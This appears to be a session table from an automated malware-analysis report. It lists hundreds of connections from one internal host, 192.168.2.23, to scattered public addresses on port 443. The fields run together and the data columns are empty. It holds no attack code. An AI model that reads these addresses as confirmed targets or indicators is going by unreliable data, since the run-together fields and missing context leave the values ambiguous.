                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17903192.168.2.234053817.220.153.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17904192.168.2.235173270.74.199.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17905192.168.2.233804294.80.140.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17906192.168.2.2335992191.87.55.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17907192.168.2.235224451.194.110.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17908192.168.2.2360956141.51.21.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17909192.168.2.2352254118.208.229.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17910192.168.2.2342692202.147.149.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17911192.168.2.233911646.133.5.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17912192.168.2.235131454.162.90.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17913192.168.2.235163849.76.49.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17914192.168.2.2336184195.10.97.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17915192.168.2.233445242.36.238.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17916192.168.2.233868651.90.180.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17917192.168.2.2351414167.77.153.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17918192.168.2.2352482107.212.207.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17919192.168.2.235520237.226.125.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17920192.168.2.2342606148.246.185.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17921192.168.2.2343594184.35.132.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17922192.168.2.2347492155.100.181.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17923192.168.2.233862214.2.214.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17924192.168.2.233557646.70.39.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17925192.168.2.235945644.31.33.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17926192.168.2.2334464196.204.66.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17927192.168.2.235747441.211.215.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17928192.168.2.233416249.77.134.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17929192.168.2.235719084.134.149.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17930192.168.2.2360276204.82.102.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17931192.168.2.2356146178.80.47.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17932192.168.2.2332904157.176.18.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17933192.168.2.2335116190.114.79.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17934192.168.2.234049838.23.161.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17935192.168.2.2341608123.81.93.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17936192.168.2.2341258106.77.232.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17937192.168.2.234769083.29.233.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17938192.168.2.235283623.156.155.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17939192.168.2.234284262.173.209.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17940192.168.2.234797048.115.184.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17941192.168.2.2355260187.124.198.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17942192.168.2.2360892101.176.90.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17943192.168.2.234047070.148.84.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17944192.168.2.2342800184.230.148.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17945192.168.2.235484644.27.152.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17946192.168.2.235175666.36.92.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17947192.168.2.2338288113.46.146.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17948192.168.2.2344658176.3.14.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17949192.168.2.2358836194.190.2.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17950192.168.2.235341851.87.247.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17951192.168.2.233557241.148.73.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17952192.168.2.2355984179.173.251.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17953192.168.2.2352218221.157.166.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17954192.168.2.2334614201.4.151.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17955192.168.2.2338312205.184.136.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17956192.168.2.2340800188.163.164.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17957192.168.2.2338340186.6.53.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17958192.168.2.2334302212.178.14.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17959192.168.2.235632286.235.100.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17960192.168.2.233697435.40.61.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17961192.168.2.2356472189.155.65.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17962192.168.2.234942490.226.122.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17963192.168.2.236081063.129.194.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17964192.168.2.233421257.200.73.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17965192.168.2.2334690143.139.52.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17966192.168.2.235396687.249.7.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17967192.168.2.233453672.49.216.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17968192.168.2.2359166109.196.215.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17969192.168.2.2342648110.205.27.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17970192.168.2.2346446104.116.86.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17971192.168.2.234442018.56.172.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17972192.168.2.2359714125.124.71.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17973192.168.2.233646427.97.76.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17974192.168.2.23380404.7.14.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17975192.168.2.235207268.148.204.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17976192.168.2.2346448155.213.95.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17977192.168.2.233502225.249.41.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17978192.168.2.235694613.128.159.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17979192.168.2.235860862.252.104.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17980192.168.2.2340892173.184.143.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17981192.168.2.2335672162.204.0.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17982192.168.2.2348346160.61.101.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17983192.168.2.2342800121.168.105.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17984192.168.2.233366487.173.219.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17985192.168.2.2346324130.188.254.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17986192.168.2.234529618.86.201.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17987192.168.2.235778072.88.52.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17988192.168.2.2345644153.96.32.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17989192.168.2.2340336211.84.60.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17990192.168.2.2355236139.10.169.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17991192.168.2.2352940132.90.82.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17992192.168.2.233814252.198.221.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17993192.168.2.235130824.44.193.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17994192.168.2.234652280.203.40.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17995192.168.2.2346218173.3.202.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17996192.168.2.2341160148.194.113.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17997192.168.2.2341142160.190.177.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17998192.168.2.2347140169.158.194.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17999192.168.2.2336910124.59.216.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18000192.168.2.234887679.115.253.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18001192.168.2.2355830205.181.13.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18002192.168.2.2341910135.110.77.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18003192.168.2.235038267.187.241.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18004192.168.2.2351900194.35.242.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18005192.168.2.2350964118.251.255.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18006192.168.2.2340536117.108.151.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18007192.168.2.2355082142.8.64.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18008192.168.2.2353196147.230.63.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18009192.168.2.2342984209.92.98.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18010192.168.2.233478442.160.146.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18011192.168.2.233310017.33.191.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18012192.168.2.2333192157.87.39.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18013192.168.2.2344666202.196.5.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18014192.168.2.234388450.94.219.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18015192.168.2.2348902112.173.68.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18016192.168.2.234332496.152.4.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18017192.168.2.2354064165.9.136.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18018192.168.2.235047419.138.118.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18019192.168.2.2356120186.111.230.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18020192.168.2.233656452.130.79.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18021192.168.2.2339286158.6.55.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18022192.168.2.2358410168.19.166.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18023192.168.2.234387867.167.102.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18024192.168.2.235939677.98.6.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18025192.168.2.2350596134.102.180.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18026192.168.2.234986042.156.189.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18027192.168.2.234443071.146.155.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18028192.168.2.2340230168.57.187.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18029192.168.2.234182047.198.89.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18030192.168.2.2333184212.246.62.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18031192.168.2.2335480103.37.160.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18032192.168.2.23539749.194.50.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18033192.168.2.233709260.177.74.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18034192.168.2.2355968217.150.3.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18035192.168.2.2336990223.205.3.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18036192.168.2.233394014.216.167.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18037192.168.2.2355562143.100.240.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18038192.168.2.2357440186.214.153.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18039192.168.2.2354512162.118.215.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18040192.168.2.2357700194.103.249.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18041192.168.2.2352184188.230.59.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18042192.168.2.2357462219.45.23.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18043192.168.2.234826891.70.160.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18044192.168.2.233466432.135.132.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18045192.168.2.2352672148.120.77.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18046192.168.2.2339932204.75.187.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18047192.168.2.234548299.132.119.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18048192.168.2.2333936203.13.163.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18049192.168.2.2334924219.27.152.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18050192.168.2.2359358205.128.197.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18051192.168.2.2340696221.240.106.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18052192.168.2.235902498.135.254.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18053192.168.2.2356570176.73.165.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18054192.168.2.2348064194.211.232.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18055192.168.2.2357676118.166.235.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18056192.168.2.236061414.58.207.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18057192.168.2.2346442187.21.203.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18058192.168.2.233277646.206.217.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18059192.168.2.235624067.90.174.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18060192.168.2.234743066.29.136.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18061192.168.2.2354726174.83.64.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18062192.168.2.2358052107.160.29.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18063192.168.2.2357228116.26.188.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18064192.168.2.2360216111.41.44.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18065192.168.2.2340960163.96.125.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18066192.168.2.2338868139.144.83.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18067192.168.2.2338156220.191.25.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18068192.168.2.235785661.19.227.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18069192.168.2.235084054.175.143.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18070192.168.2.2334818120.12.69.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18071192.168.2.233564245.191.176.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18072192.168.2.235692087.95.114.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18073192.168.2.2356186181.78.210.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18074192.168.2.2357128156.193.206.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18075192.168.2.2355094167.81.11.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18076192.168.2.235712892.229.156.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18077192.168.2.235413270.211.11.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18078192.168.2.2337064205.190.108.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18079192.168.2.2348538185.180.131.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18080192.168.2.235850849.12.247.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18081192.168.2.235798446.71.223.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18082192.168.2.2351064166.74.161.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18083192.168.2.2349072201.53.7.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18084192.168.2.233513660.181.90.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18085192.168.2.234617069.237.56.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18086192.168.2.2350682223.249.23.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18087192.168.2.23337409.43.158.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18088192.168.2.234494840.164.79.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18089192.168.2.2342122208.89.156.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18090192.168.2.2351558210.138.154.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18091192.168.2.235557261.171.104.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18092192.168.2.235606886.128.216.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18093192.168.2.2354480187.181.192.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18094192.168.2.234710218.152.190.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18095192.168.2.235834886.237.41.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18096192.168.2.234673817.168.29.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18097192.168.2.234025468.207.206.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18098192.168.2.235235838.240.239.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18099192.168.2.23369589.54.114.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18100192.168.2.233709284.91.91.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18101192.168.2.234605088.69.68.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18102192.168.2.233356261.54.14.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18103192.168.2.2349092187.133.242.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18104192.168.2.2342818143.191.187.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18105192.168.2.235344277.4.151.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18106192.168.2.2347166195.202.24.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18107192.168.2.2357228147.91.171.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18108192.168.2.234401237.1.74.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18109192.168.2.233434619.169.139.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18110192.168.2.235849697.174.17.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18111192.168.2.2358920112.98.183.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18112192.168.2.235350249.240.52.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18113192.168.2.2337070222.41.205.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18114192.168.2.234574424.151.39.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18115192.168.2.2342418206.72.130.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18116192.168.2.235755048.154.209.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18117192.168.2.2340694118.14.66.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18118192.168.2.235788824.200.175.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18119192.168.2.2359082204.252.190.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18120192.168.2.2348312196.33.198.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18121192.168.2.2345488112.116.136.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18122192.168.2.2358924216.134.140.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18123192.168.2.2346020183.132.123.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18124192.168.2.235486018.52.175.211443
